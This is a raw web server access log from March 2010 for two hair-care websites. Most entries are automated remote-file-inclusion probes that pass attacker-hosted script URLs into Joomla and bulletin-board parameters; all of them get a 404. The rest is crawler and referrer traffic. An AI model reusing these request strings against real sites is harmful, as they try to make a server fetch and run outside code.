58.150.99.144 - - [08/Mar/2010:06:37:48 -0800] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.150.99.144 - - [08/Mar/2010:06:37:49 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.150.99.144 - - [08/Mar/2010:06:37:49 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.150.99.144 - - [08/Mar/2010:06:37:53 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.150.99.144 - - [08/Mar/2010:06:37:53 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.150.99.144 - - [08/Mar/2010:06:37:53 -0800] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
174.133.164.82 - - [08/Mar/2010:06:41:22 -0800] "GET /logs/access.log//bbs/skin/ggambo7002_board/comment_modify.php//bbs/skin/ggambo7002_board/write.php?dir=http://plrniches.com/lib/fatal1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
86.57.245.125 - - [08/Mar/2010:06:41:40 -0800] "GET /freehairsecretsphp/ HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "growlonghairfast.com"
86.57.245.125 - - [08/Mar/2010:06:41:41 -0800] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "growlonghairfast.com"
174.133.164.82 - - [08/Mar/2010:06:44:16 -0800] "GET /logs/access.log//bbs/skin/ggambo7002_board/comment_modify.php//bbs/skin/ggambo7002_board/write.php?dir=http://plrniches.com/lib/fatal1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
118.129.166.154 - - [08/Mar/2010:06:45:39 -0800] "GET /logs/access.log//bbs//////////good.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
174.133.164.82 - - [08/Mar/2010:06:47:17 -0800] "GET /logs/access_100125.log//bbs/skin/ggambo7002_board/comment_modify.php//bbs/skin/ggambo7002_board/write.php?dir=http://plrniches.com/lib/fatal1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.47.237.17 - - [08/Mar/2010:07:04:45 -0800] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
211.47.237.17 - - [08/Mar/2010:07:04:45 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
211.47.237.17 - - [08/Mar/2010:07:04:45 -0800] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
211.47.237.17 - - [08/Mar/2010:07:04:45 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
211.47.237.17 - - [08/Mar/2010:07:04:45 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
211.47.237.17 - - [08/Mar/2010:07:04:48 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.101.214.54 - - [08/Mar/2010:07:06:29 -0800] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.101.214.54 - - [08/Mar/2010:07:06:29 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.101.214.54 - - [08/Mar/2010:07:06:29 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.150.99.144 - - [08/Mar/2010:07:07:03 -0800] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.150.99.144 - - [08/Mar/2010:07:07:03 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.150.99.144 - - [08/Mar/2010:07:07:07 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.88.4.74 - - [08/Mar/2010:07:11:11 -0800] "GET /logs/bbs/poll_etc_update.php?g4[path]=http://www.dialog-kiado.hu/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.88.4.74 - - [08/Mar/2010:07:11:11 -0800] "GET /bbs/poll_etc_update.php?g4[path]=http://www.dialog-kiado.hu/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.88.4.74 - - [08/Mar/2010:07:11:11 -0800] "GET /logs/access.log/bbs/poll_etc_update.php?g4[path]=http://www.dialog-kiado.hu/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.88.25.28 - - [08/Mar/2010:07:12:42 -0800] "GET /freehairsecretsphp/ HTTP/1.0" 200 333 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
212.241.177.123 - - [08/Mar/2010:07:31:39 -0800] "GET /logs////index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.moterostrailmadrid.es//modules/gallery/gif/error/bid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
212.241.177.123 - - [08/Mar/2010:07:31:39 -0800] "GET /logs/access.log%20%20////index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.moterostrailmadrid.es//modules/gallery/gif/error/bid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
212.241.177.123 - - [08/Mar/2010:07:31:40 -0800] "GET ///index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.moterostrailmadrid.es//modules/gallery/gif/error/bid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
212.117.183.169 - - [08/Mar/2010:07:34:55 -0800] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows XP)" "growlonghairfast.com"
212.117.183.169 - - [08/Mar/2010:07:34:55 -0800] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows XP)" "growlonghairfast.com"
202.102.72.38 - - [08/Mar/2010:07:38:37 -0800] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "freehairsecrets.com"
75.43.49.126 - - [08/Mar/2010:07:38:42 -0800] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "freehairsecrets.com"
195.116.233.210 - - [08/Mar/2010:07:38:44 -0800] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "freehairsecrets.com"
24.209.50.248 - - [08/Mar/2010:07:39:06 -0800] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "freehairsecrets.com"
67.180.213.120 - - [08/Mar/2010:07:39:31 -0800] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "freehairsecrets.com"
76.113.157.102 - - [08/Mar/2010:07:39:35 -0800] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "freehairsecrets.com"
72.199.222.28 - - [08/Mar/2010:07:39:37 -0800] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "freehairsecrets.com"
75.43.49.126 - - [08/Mar/2010:07:40:46 -0800] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "freehairsecrets.com"
66.229.58.41 - - [08/Mar/2010:07:41:05 -0800] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "freehairsecrets.com"
67.167.139.37 - - [08/Mar/2010:07:41:06 -0800] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "freehairsecrets.com"
8.9.209.2 - - [08/Mar/2010:07:41:37 -0800] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "freehairsecrets.com"
202.102.72.38 - - [08/Mar/2010:07:41:42 -0800] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "freehairsecrets.com"
24.190.42.67 - - [08/Mar/2010:07:41:49 -0800] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "freehairsecrets.com"
67.180.213.120 - - [08/Mar/2010:07:42:02 -0800] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "freehairsecrets.com"
24.209.50.248 - - [08/Mar/2010:07:42:11 -0800] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "freehairsecrets.com"
67.180.213.120 - - [08/Mar/2010:07:42:24 -0800] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "freehairsecrets.com"
59.90.185.153 - - [08/Mar/2010:07:42:37 -0800] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "freehairsecrets.com"
190.47.192.103 - - [08/Mar/2010:07:42:59 -0800] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "freehairsecrets.com"
97.83.122.86 - - [08/Mar/2010:07:43:49 -0800] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "freehairsecrets.com"
24.190.42.67 - - [08/Mar/2010:07:43:50 -0800] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "freehairsecrets.com"
190.206.3.138 - - [08/Mar/2010:07:44:24 -0800] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "freehairsecrets.com"
190.206.3.138 - - [08/Mar/2010:07:45:16 -0800] "GET / HTTP/1.0" 200 910 "http://freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "freehairsecrets.com"
67.195.112.42 - - [08/Mar/2010:07:46:17 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.freehairsecrets.com"
67.195.112.42 - - [08/Mar/2010:07:46:18 -0800] "GET /logs/access_091019.log HTTP/1.0" 200 561992 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.freehairsecrets.com"
67.195.112.42 - - [08/Mar/2010:07:47:23 -0800] "GET /tmp/ HTTP/1.0" 200 643 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.freehairsecrets.com"
112.76.72.3 - - [08/Mar/2010:07:58:50 -0800] "GET /bbs//////////delete_all.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
112.76.72.3 - - [08/Mar/2010:07:58:50 -0800] "GET /logs//bbs//////////delete_all.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
112.76.72.3 - - [08/Mar/2010:07:58:50 -0800] "GET /logs/access.log%20%20//bbs//////////delete_all.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
66.249.65.102 - - [08/Mar/2010:08:03:33 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "growlonghairfast.com"
221.130.13.94 - - [08/Mar/2010:08:05:26 -0800] "GET /freehairsecretsphp/index.php HTTP/1.1" 200 349 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MyIE2; Deepnet Explorer)" "growlonghairfast.com"
81.169.185.39 - - [08/Mar/2010:08:05:29 -0800] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MyIE2; Deepnet Explorer)" "growlonghairfast.com"
59.33.247.10 - - [08/Mar/2010:08:05:32 -0800] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MyIE2; Deepnet Explorer)" "growlonghairfast.com"
201.43.0.234 - - [08/Mar/2010:08:05:36 -0800] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MyIE2; Deepnet Explorer)" "growlonghairfast.com"
78.26.128.146 - - [08/Mar/2010:08:05:58 -0800] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MyIE2; Deepnet Explorer)" "growlonghairfast.com"
121.88.4.74 - - [08/Mar/2010:08:32:06 -0800] "GET /logs/access.log/poll_etc_update.php?g4[path]=http://www.dialog-kiado.hu/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.88.4.74 - - [08/Mar/2010:08:32:06 -0800] "GET /logs/poll_etc_update.php?g4[path]=http://www.dialog-kiado.hu/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.88.4.74 - - [08/Mar/2010:08:32:06 -0800] "GET /poll_etc_update.php?g4[path]=http://www.dialog-kiado.hu/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
110.45.145.178 - - [08/Mar/2010:08:33:11 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
200.93.147.154 - - [08/Mar/2010:08:33:26 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://hep.or.kr//tc/skin/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
200.93.147.154 - - [08/Mar/2010:08:33:26 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://hep.or.kr//tc/skin/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
200.93.147.154 - - [08/Mar/2010:08:33:27 -0800] "GET /logs/access.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://hep.or.kr//tc/skin/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
110.45.145.178 - - [08/Mar/2010:08:33:54 -0800] "GET /logs/access_100118.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
110.45.145.178 - - [08/Mar/2010:08:33:54 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
110.45.145.178 - - [08/Mar/2010:08:33:54 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
110.45.145.178 - - [08/Mar/2010:08:34:14 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
110.45.145.178 - - [08/Mar/2010:08:34:47 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
110.45.145.178 - - [08/Mar/2010:08:36:38 -0800] "GET /logs/access_091130.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
110.45.145.178 - - [08/Mar/2010:08:38:15 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
77.234.201.2 - - [08/Mar/2010:08:41:31 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.234.201.2 - - [08/Mar/2010:08:41:31 -0800] "GET /logs/access.log%20%20//bbs/write_update.php?board_skin_path=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.234.201.2 - - [08/Mar/2010:08:41:31 -0800] "GET /bbs/write_update.php?board_skin_path=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.234.201.2 - - [08/Mar/2010:08:41:59 -0800] "GET /logs/access_100125.log%20%20//bbs/write_update.php?board_skin_path=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.234.201.2 - - [08/Mar/2010:08:41:59 -0800] "GET /bbs/write_update.php?board_skin_path=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.234.201.2 - - [08/Mar/2010:08:41:59 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
200.93.147.154 - - [08/Mar/2010:08:42:20 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://hep.or.kr//tc/skin/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
200.93.147.154 - - [08/Mar/2010:08:42:21 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://hep.or.kr//tc/skin/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
200.93.147.154 - - [08/Mar/2010:08:42:21 -0800] "GET /logs/access_100125.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://hep.or.kr//tc/skin/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.145.178 - - [08/Mar/2010:08:43:39 -0800] "GET /logs/access_100118.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
110.45.145.178 - - [08/Mar/2010:08:43:40 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
110.45.145.178 - - [08/Mar/2010:08:43:40 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
118.129.166.154 - - [08/Mar/2010:08:44:00 -0800] "GET /logs/access.log//bbs//////////delete_all.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
118.129.166.154 - - [08/Mar/2010:08:44:00 -0800] "GET /logs//bbs//////////delete_all.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
118.129.166.154 - - [08/Mar/2010:08:44:00 -0800] "GET /bbs//////////delete_all.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
110.45.145.178 - - [08/Mar/2010:08:45:49 -0800] "GET /logs/access_091123.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
118.129.166.154 - - [08/Mar/2010:08:45:58 -0800] "GET /logs/access.log//bbs//////////delete_all.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
118.129.166.154 - - [08/Mar/2010:08:45:58 -0800] "GET /bbs//////////delete_all.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
118.129.166.154 - - [08/Mar/2010:08:45:58 -0800] "GET /logs//bbs//////////delete_all.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
110.45.145.178 - - [08/Mar/2010:08:48:16 -0800] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
110.45.145.178 - - [08/Mar/2010:08:48:17 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
110.45.145.178 - - [08/Mar/2010:08:48:17 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
110.45.145.178 - - [08/Mar/2010:08:50:50 -0800] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
110.45.145.178 - - [08/Mar/2010:08:50:51 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
110.45.145.178 - - [08/Mar/2010:08:50:51 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
118.129.166.154 - - [08/Mar/2010:08:53:23 -0800] "GET /logs/access_100125.log//bbs//////////delete_all.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
